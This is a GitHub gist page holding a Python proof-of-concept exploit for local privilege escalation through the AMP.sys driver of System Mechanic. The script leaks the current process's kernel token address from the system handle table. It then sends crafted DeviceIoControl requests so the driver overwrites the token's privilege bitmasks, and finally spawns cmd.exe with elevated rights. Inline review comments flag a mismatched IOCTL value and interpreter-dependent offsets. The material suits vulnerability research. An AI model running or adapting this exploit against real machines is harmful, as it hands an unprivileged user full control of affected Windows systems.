Last active
November 25, 2021 07:33
-
-
Save alxbl/2fb9a0583c5b88db2b4d1a7f2ca5cdda to your computer and use it in GitHub Desktop.
WKE - Local Privilege Escalation using System Mechanic's AMP.sys driver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import random | |
import binascii | |
import struct | |
import os | |
from ctypes import * | |
from ctypes.wintypes import * | |
# Shorthands for some ctypes stuff.
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.psapi
advapi32 = windll.advapi32
OpenProcessToken = advapi32.OpenProcessToken
# Constants.
# Access / creation flags passed to CreateFileA.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
# NTSTATUS codes compared against the return value of NtQuerySystemInformation.
STATUS_SUCCESS = 0
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
STATUS_INVALID_HANDLE = 0xC0000008
# Desired access passed to OpenProcessToken.
TOKEN_QUERY = 8
# Information class passed to NtQuerySystemInformation.
SystemExtendedHandleInformation = 64
# NTSTATUS is declared unsigned so that returned status codes compare equal to
# the positive 0xC... constants above.
NTSTATUS = DWORD
PHANDLE = POINTER(HANDLE)
# NOTE: this rebinds LPVOID from ctypes.wintypes and aliases ULONG_PTR to a
# pointer type; a NULL/zero value of these types reads back as None in ctypes.
PVOID = LPVOID = ULONG_PTR = c_void_p
INVALID_HANDLE_VALUE = -1
# Win32 device path opened with CreateFileA.
DEVICE_NAME = "\\\\.\\AMP"
# Function signature helpers.
ntdll.NtQuerySystemInformation.argtypes = [DWORD, PVOID, ULONG, POINTER(ULONG)]
ntdll.NtQuerySystemInformation.restype = NTSTATUS
advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)]
advapi32.OpenProcessToken.restype = BOOL
# IOCTL: 0x226003 -> CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_NEITHER, FILE_READ_ACCESS)
# NOTE(review): this comment previously read 0x226033 / function 0x80C, which
# does not match the value assigned below -- confirm which code is intended.
IOCTL_CODE = 0x226003
# For fuzzing
BUFSZ = 0x100
MAX_ITER = 0x10000
# Structures for NtQuerySystemInformation. | |
class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
    """
    One handle-table entry as returned by NtQuerySystemInformation for the
    SystemExtendedHandleInformation class.

    UniqueProcessId and HandleValue are pointer-sized *integers*, so they are
    declared as c_size_t: same size and layout as a pointer, but a zero value
    reads back as 0 instead of None. Object stays a pointer.
    """
    _fields_ = [
        ("Object", c_void_p),            # address of the object behind the handle
        ("UniqueProcessId", c_size_t),   # PID owning the handle
        ("HandleValue", c_size_t),       # handle value inside that process
        ("GrantedAccess", ULONG),
        ("CreatorBackTraceIndex", USHORT),
        ("ObjectTypeIndex", USHORT),
        ("HandleAttributes", ULONG),
        ("Reserved", ULONG),
    ]
class SYSTEM_HANDLE_INFORMATION_EX(Structure):
    """
    Header of the buffer returned by NtQuerySystemInformation for the
    SystemExtendedHandleInformation class.

    NumberOfHandles and Reserved are pointer-sized integers, declared as
    c_size_t so that an empty table reads as 0 rather than None. Handles is
    declared with a single element; the real buffer holds NumberOfHandles
    entries back to back.
    """
    _fields_ = [
        ("NumberOfHandles", c_size_t),
        ("Reserved", c_size_t),
        ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
    ]
def rand_buff(n):
    """Return a list of ``n`` random integers, each between 0x00 and 0xFF."""
    values = []
    for _ in range(n):
        values.append(random.randint(0x00, 0xFF))
    return values
def open_fd():
    """
    Opens the device driver.

    Returns the value produced by the second CreateFileA call. When the
    device cannot be opened this is INVALID_HANDLE_VALUE; the failure is
    reported on stdout and the value is still returned, so callers see the
    same return contract as before.
    """
    def _create():
        # Single place for the CreateFileA arguments used by both attempts.
        return kernel32.CreateFileA(DEVICE_NAME,
                                    GENERIC_READ | GENERIC_WRITE,
                                    0,
                                    None,
                                    OPEN_EXISTING,
                                    0,
                                    None)

    # Open and immediately close once before the real open.
    # This avoids a weird bug where the device handle refuses to open in Python (!?)
    kernel32.CloseHandle(_create())

    handle = _create()
    if handle == INVALID_HANDLE_VALUE:
        # Previously the success message was printed unconditionally.
        print('[-] Could not open ' + DEVICE_NAME + ': error ' + str(kernel32.GetLastError()))
    else:
        print('[+] Got Driver Handle: ' + str(handle))
    return handle
def close_handle(h):
    """Close the handle ``h`` through kernel32.CloseHandle."""
    kernel32.CloseHandle(h)
def find_handles(pid, data):
    """
    Parses the output of NtQuerySystemInformation to find handles associated
    with the given PID.

    ``data`` is the raw buffer (a ctypes byte array or any bytes-like
    object): a 16-byte header whose first 64-bit value is the entry count,
    followed by 40-byte entries. The layout is decoded with fixed
    little-endian 64-bit formats.

    Returns a list of ``(pid, object_address, handle_value)`` tuples for the
    entries whose owning PID equals ``pid``. A buffer that is too short for
    its advertised entry count is parsed up to the last complete entry
    instead of raising.
    """
    header_fmt = struct.Struct('<QQ')        # NumberOfHandles, Reserved
    entry_fmt = struct.Struct('<QQQLHHLL')   # one 40-byte table entry

    # Copy once; entries are then decoded in place by offset rather than by
    # re-slicing the remaining buffer for every entry (which was quadratic).
    raw = bytearray(data)
    print('[+] Leaking access token address')
    if len(raw) < header_fmt.size:
        return []

    nentries = header_fmt.unpack_from(raw, 0)[0]
    # Never trust the advertised count beyond what the buffer really holds.
    available = (len(raw) - header_fmt.size) // entry_fmt.size
    nentries = min(nentries, available)

    handles = []
    offset = header_fmt.size
    end = offset + nentries * entry_fmt.size
    while offset < end:
        obj, hpid, handle = entry_fmt.unpack_from(raw, offset)[:3]
        offset += entry_fmt.size
        if hpid == pid:
            handles.append((hpid, obj, handle))
    return handles
def get_token_address():
    """
    Leverage userland APIs to leak the current process' token address in kernel
    land.

    Opens the current process token with TOKEN_QUERY, snapshots the system
    handle table with NtQuerySystemInformation and looks up the entry for
    that token handle in the current process.

    Returns the object address recorded for the token handle, or None when
    the token cannot be opened, the handle table cannot be queried, or the
    handle is not found exactly once.
    """
    hProc = HANDLE(kernel32.GetCurrentProcess())
    pid = kernel32.GetCurrentProcessId()
    print('[+] Current PID: ' + str(pid))

    h = HANDLE()
    if OpenProcessToken(hProc, TOKEN_QUERY, byref(h)) == 0:
        print('[-] Error getting token handle: ' + str(kernel32.GetLastError()))
        # Without a token handle there is nothing to look up.
        return None
    print('[+] Token Handle: ' + str(h.value))

    # Find the handles associated with the current process.
    # Grow the buffer one page at a time until the call stops reporting that
    # it is too small.
    q = STATUS_INFO_LENGTH_MISMATCH
    out = DWORD(0)
    sz = 0
    while q == STATUS_INFO_LENGTH_MISMATCH:
        sz += 0x1000
        handle_info = (c_ubyte * sz)()
        q = ntdll.NtQuerySystemInformation(SystemExtendedHandleInformation, byref(handle_info), sz, byref(out))
    if q != STATUS_SUCCESS:
        # Any other status means the buffer contents are not a handle table.
        print('[-] NtQuerySystemInformation failed: ' + hex(q))
        return None

    # Parse handle_info to retrieve handles for the current PID
    handles = find_handles(pid, handle_info)
    matches = [entry for entry in handles if entry[0] == pid and entry[2] == h.value]
    if len(matches) != 1:
        print('[-] Could not find access token address!')
        return None

    pToken = matches[0][1]
    print('[+] Found token at ' + hex(pToken))
    return pToken
def exploit(h):
    """
    Exploits the bug to escalate privileges.

    Issues three DeviceIoControl requests (IOCTL_CODE) on the driver handle
    ``h``. Each request buffer is three packed 64-bit values: a function ID
    (0x8), a pointer to an argument buffer and a destination address derived
    from the current process' token address. Afterwards cmd.exe is started.

    Exits the process with -1 when the token address cannot be obtained or
    when the last DeviceIoControl call reports failure.

    Reminder:
    0: kd> dt nt!_SEP_TOKEN_PRIVILEGES
    +0x000 Present : Uint8B
    +0x008 Enabled : Uint8B
    +0x010 EnabledByDefault : Uint8B
    """
    h = HANDLE(h)
    result = DWORD()  # passed by reference to every DeviceIoControl call below
    token = get_token_address()
    if token is None: sys.exit(-1)
    # Four packed 64-bit zeros (32 bytes), shared as the argument buffer of
    # all three requests.
    PARAMS = ''.join([struct.pack('<Q', x) for x in [0, 0, 0, 0]])
    # NOTE: We add +1 to ensure that the low bytes are 0xff.
    # NOTE(review): id(PARAMS) + 32 presumably skips the interpreter's string
    # object header to reach the character data -- this depends on the
    # interpreter build; TODO confirm.
    # NOTE(review): the 0x40 / 0x48 / 0x50 offsets presumably place
    # _SEP_TOKEN_PRIVILEGES at token + 0x40 -- confirm for the target build.
    fid = struct.pack('<q', 0x8) # Function ID to call
    args = struct.pack('<Q', id(PARAMS) + 32) # Pointer to argument buffer (gets read)
    dst = struct.pack('<Q', token + 0x48 + 1) # Destination Buffer (gets written)
    ENABLED = bytes(''.join([ fid, args, dst ]))
    fid = struct.pack('<q', 0x8) # Function ID to call
    args = struct.pack('<Q', id(PARAMS) + 32) # Pointer to argument buffer (gets read)
    dst = struct.pack('<Q', token + 0x40 + 1) # Destination Buffer (gets written)
    PRESENT = bytes(''.join([ fid, args, dst ]))
    fid = struct.pack('<q', 0x8) # Function ID to call
    args = struct.pack('<Q', id(PARAMS) + 32) # Pointer to argument buffer (gets read)
    dst = struct.pack('<Q', token + 0x50 + 1) # Destination Buffer (gets written)
    DEFAULT = bytes(''.join([ fid, args, dst ]))
    # NOTE(review): res is overwritten by each call, so only the outcome of
    # the third request is checked below.
    print('[+] Writing _SEP_TOKEN_PRIVILEGES.Enabled')
    res = kernel32.DeviceIoControl(h, IOCTL_CODE, ENABLED, len(ENABLED), 0, 0, byref(result), None)
    print('[+] Writing _SEP_TOKEN_PRIVILEGES.Present')
    res = kernel32.DeviceIoControl(h, IOCTL_CODE, PRESENT, len(PRESENT), 0, 0, byref(result), None)
    print('[+] Writing _SEP_TOKEN_PRIVILEGES.Default')
    res = kernel32.DeviceIoControl(h, IOCTL_CODE, DEFAULT, len(DEFAULT), 0, 0, byref(result), None)
    if res == 0:
        err = kernel32.GetLastError()
        print('[!] IOCTL Failure. Result: ' + hex(err))
        sys.exit(-1)
    print('[+] All done! Spawning a privileged shell.')
    print('[+] Check your privileges: !token %x' % (token))
    os.system('cmd.exe')
if __name__ == "__main__":
    # Script entry point: open the device, run the exploit, release the handle.
    h = open_fd()
    try:
        exploit(h)
    finally:
        # exploit() can leave through sys.exit(); the device handle is
        # released on that path too.
        close_handle(h)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment